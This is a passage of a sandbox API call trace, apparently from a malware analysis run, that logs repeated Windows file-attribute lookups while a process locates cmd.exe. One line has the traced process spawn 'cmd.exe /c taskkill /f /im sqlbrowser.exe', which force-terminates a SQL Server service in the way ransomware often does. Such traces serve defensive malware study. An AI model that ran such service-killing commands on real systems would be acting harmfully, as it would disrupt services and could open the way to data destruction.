fInfoLevelId=0x0, lpFileInformation=0x123b0dc8 | out: lpFileInformation=0x123b0dc8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0146.734] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0146.734] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x123b0e18 | out: lpFileInformation=0x123b0e18*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0146.735] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0146.735] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x123b0e68 | out: lpFileInformation=0x123b0e68*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0146.735] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0146.735] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x123b0eb8 | out: lpFileInformation=0x123b0eb8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0146.735] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0146.736] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x123b0f08 | out: lpFileInformation=0x123b0f08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0146.736] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0146.736] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x123b0f58 | out: lpFileInformation=0x123b0f58*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0146.736] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0146.736] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x123b0fa8 | out: lpFileInformation=0x123b0fa8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0146.737] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0146.737] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x123b0ff8 | out: lpFileInformation=0x123b0ff8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0146.737] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0146.738] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x123b1048 | out: lpFileInformation=0x123b1048*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0146.738] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0146.738] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x123b1098 | out: lpFileInformation=0x123b1098*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0146.738] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0146.738] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x123b10e8 | out: lpFileInformation=0x123b10e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0146.739] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0146.739] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x123ba820, nSize=0x64 | out: lpBuffer="") returned 0x63 [0146.739] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123b1138 | out: lpFileInformation=0x123b1138*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0146.739] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123ba8f0, nSize=0x64 | out: lpBuffer="") returned 0x35 [0146.739] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123b1188 | out: lpFileInformation=0x123b1188*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0146.739] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x13c [0146.740] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0146.740] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0146.740] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0146.740] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0146.740] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0146.740] GetEnvironmentStringsW () returned 0x8ea900* [0146.741] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0146.741] GetCurrentProcess () returned 0xffffffff [0146.741] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x13c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x123931c0, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x123931c0*=0x140) returned 1 [0146.741] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x123931c4, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x123931c4*=0x144) returned 1 [0146.741] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x123931c8, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x123931c8*=0x154) returned 1 [0146.743] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im sqlbrowser.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x12420000, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x140, hStdOutput=0x144, hStdError=0x154), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im sqlbrowser.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x130, hThread=0x158, dwProcessId=0x5e0, dwThreadId=0x864)) returned 1 [0146.960] SetEvent (hEvent=0x150) returned 1 [0146.960] CloseHandle (hObject=0x158) returned 1 [0146.960] CloseHandle (hObject=0x154) returned 1 [0146.960] CloseHandle (hObject=0x144) returned 1 [0146.960] CloseHandle (hObject=0x140) returned 1 [0146.960] CloseHandle (hObject=0x13c) returned 1 [0146.960] CloseHandle (hObject=0x138) returned 1 [0146.960] CloseHandle (hObject=0x134) returned 1 [0146.960] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0xffffffff) returned 0x0 [0149.421] SetEvent (hEvent=0x150) returned 1 [0149.421] GetExitCodeProcess (in: hProcess=0x130, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0149.422] GetProcessTimes (in: hProcess=0x130, lpCreationTime=0x12391bc0, lpExitTime=0x12391bc8, lpKernelTime=0x12391bd0, lpUserTime=0x12391bd8 | out: lpCreationTime=0x12391bc0, lpExitTime=0x12391bc8, lpKernelTime=0x12391bd0, lpUserTime=0x12391bd8) returned 1 [0149.422] CloseHandle (hObject=0x130) returned 1 [0149.422] SetEvent (hEvent=0x128) returned 1 [0149.423] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x4) returned 0x102 [0149.430] SetEvent (hEvent=0x150) returned 1 [0149.430] SetEvent (hEvent=0x128) returned 1 [0149.431] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123e84e0, nSize=0x64 | out: lpBuffer="") returned 0x35 [0149.431] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123f08c8 | out: lpFileInformation=0x123f08c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0149.432] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0149.432] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x123f0918 | out: lpFileInformation=0x123f0918*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0149.432] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0149.432] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x123f0968 | out: lpFileInformation=0x123f0968*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0149.432] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0149.432] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x123f09b8 | out: lpFileInformation=0x123f09b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0149.432] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0149.432] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x123f0a08 | out: lpFileInformation=0x123f0a08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0149.433] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0149.433] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x123f0a58 | out: lpFileInformation=0x123f0a58*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0149.433] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0149.433] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x123f0aa8 | out: lpFileInformation=0x123f0aa8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0149.433] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0149.433] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x123f0af8 | out: lpFileInformation=0x123f0af8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0149.433] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0149.433] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x123f0b48 | out: lpFileInformation=0x123f0b48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0149.433] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0149.433] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x123f0b98 | out: lpFileInformation=0x123f0b98*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0149.434] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0149.434] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x123f0be8 | out: lpFileInformation=0x123f0be8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0149.434] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0149.434] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x123f0c38 | out: lpFileInformation=0x123f0c38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0149.434] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0149.434] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x123e85b0, nSize=0x64 | out: lpBuffer="") returned 0x63 [0149.434] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123f0c88 | out: lpFileInformation=0x123f0c88*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0149.449] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123e8680, nSize=0x64 | out: lpBuffer="") returned 0x35 [0149.449] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123f0cd8 | out: lpFileInformation=0x123f0cd8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0149.449] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0149.449] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0149.449] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, 